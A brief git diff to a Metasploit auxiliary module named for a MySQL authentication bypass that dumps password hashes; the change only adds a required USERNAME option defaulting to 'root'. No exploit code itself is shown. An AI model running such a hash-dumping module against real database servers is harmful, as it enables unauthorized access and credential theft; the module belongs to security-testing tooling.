new mode 100755
diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
index bad9a4b837..92abc35387 100644
--- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
@@ -40,6 +40,9 @@ class Metasploit3 < Msf::Auxiliary
 		)
 
 		deregister_options('PASSWORD')
+		register_options( [ 
+			OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ]) 
+		], self.class )
 	end